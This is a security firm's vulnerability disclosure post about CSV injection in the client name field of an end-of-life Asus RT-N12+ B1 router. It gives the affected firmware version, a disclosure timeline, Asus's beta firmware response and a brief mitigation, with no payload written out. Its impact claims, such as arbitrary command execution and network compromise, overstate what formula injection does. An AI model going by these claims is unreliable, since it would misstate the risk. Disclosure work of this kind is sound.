A critical vulnerability has been uncovered in the Asus RT-N12+ B1 router, specifically related to CSV Injection. This flaw poses a significant threat to device security and the networks it serves. CSV Injection allows attackers to inject malicious commands into CSV files, potentially leading to unauthorized access, data manipulation, or system compromise.
ASUS RT-N300 B1 Firmware version 3.0.0.4.380.10931
Impact of the Vulnerability
- Data Breach: Unauthorized access to sensitive data stored on the router or network-connected devices.
- Network Compromise: Attackers can execute arbitrary commands, compromising network integrity.
- Disruption of Services: Potential network disruptions, service outages, or system failures.
- Exploitation of Connected Devices: Attackers may target other network-connected devices, amplifying the damage.
- Regulatory and Legal Ramifications: Organizations may face fines, legal liabilities, and reputational damage.
Timeline:
- Initial Contact: 21/2/2024 – Report submitted to Asus, outlining the vulnerability.
- Follow-up Contact 2: 28/02/2024 – First follow-up communication with Asus.
- Asus Revert Back: 05/03/2024 – Acknowledgment received from Asus.
Asus has officially declared that the RT-N12+ B1 (RT-N300 B1) router has reached the end of its product life cycle. Consequently, firmware maintenance and updates for this model were discontinued years ago. This cessation of support leaves the device vulnerable to existing security flaws within its firmware.
Asus has indicated that a beta version of the router’s firmware is now available for testing. They are seeking user feedback to ascertain if this beta version effectively addresses the identified issue. The beta firmware can be accessed and reviewed via the following link: [link]
- Follow-up Contact 3: 01/04/2024 – Second follow-up communication with Asus.
- Asus Revert Back: 01/04/2024 – Acknowledgment received from Asus.
- Follow-up Contact 4: 02/04/2024 – Third follow-up communication with Asus.
- Asus Revert Back: 12/04/2024 – Continued follow-up communication with Asus.
Asus has indicated that upon examination, they’ve determined that the firmware size for this model is excessively large, and the product has reached the end of its life cycle, posing challenges for ongoing maintenance.
Additionally, they have provided a beta firmware version for the router firmware. They’ve requested feedback on whether the provided firmware effectively addresses the identified issues. You can access the beta firmware file through the following link: [Asus Beta Firmware]
Vulnerability Description: CSV Injection in Asus RT-N12+ B1 Router
CSV Injection vulnerabilities allow attackers to gain unwarranted access to sensitive information stored within networks. Attackers can compromise the router’s integrity, facilitating unauthorized network access and the execution of arbitrary commands.
Proof-of-Concept: Exploiting Excel Formulas in Client Name Parameter
Exploiting the CSV Injection vulnerability enables attackers to inject malicious commands into CSV files, compromising network security. This could lead to data breaches, service outages, and regulatory non-compliance issues.
Mitigation:
The CSV Injection vulnerability is to validate user input and escape special characters when handling CSV files.
TL;DR
- Issue: CSV Injection in Asus RT-N12+ B1 router.
- Impact: Unauthorized access and network compromise.
- Response: Asus provided beta firmware for testing.
- Communication: Good coordination with Asus.
- Support: Updates from Asus, facing challenges due to the router’s end-of-life status.
Redfox Security is a diverse network of expert security consultants with a global mindset and a collaborative culture. If you are looking to improve your organization’s security posture, contact us today to discuss your security testing needs. Our team of security professionals can help you identify vulnerabilities and weaknesses in your systems and provide recommendations to remediate them.
“Join us on our journey of growth and development by signing up for our comprehensive courses.”
